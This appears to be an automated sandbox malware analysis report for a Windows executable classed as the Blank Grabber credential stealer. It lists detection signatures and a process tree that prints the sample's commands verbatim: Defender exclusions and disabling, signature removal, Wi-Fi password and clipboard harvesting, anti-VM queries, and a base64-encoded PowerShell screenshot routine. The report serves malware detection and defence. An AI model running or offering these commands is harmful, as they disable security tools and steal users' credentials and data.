Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
X9g8L63QGs.exe

Overview

General Information

Sample name:X9g8L63QGs.exe
renamed because original name is a hash value
Original sample name:006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4.exe
Analysis ID:1584308
MD5:17e85e39754db87356121c00e17d3096
SHA1:ab01140ebc61d625989f842eb2db9bdc79c15444
SHA256:006d680fdd592bcabb6ba965c61a82c2c97c1e30f5845984b5a5fb6b358316b4
Tags:exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • X9g8L63QGs.exe (PID: 3396 cmdline: "C:\Users\user\Desktop\X9g8L63QGs.exe" MD5: 17E85E39754DB87356121C00E17D3096)
    • X9g8L63QGs.exe (PID: 3800 cmdline: "C:\Users\user\Desktop\X9g8L63QGs.exe" MD5: 17E85E39754DB87356121C00E17D3096)
      • cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7268 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1260 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7296 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 1516 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 5568 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7276 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7332 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7340 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7692 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7792 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 7824 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7876 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8088 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8172 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7192 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7844 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7772 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7312 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3540 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7392 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7280 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 700 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1196 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 3620 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 6836 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2044 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3920 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5528 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7256 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7756 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5940 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
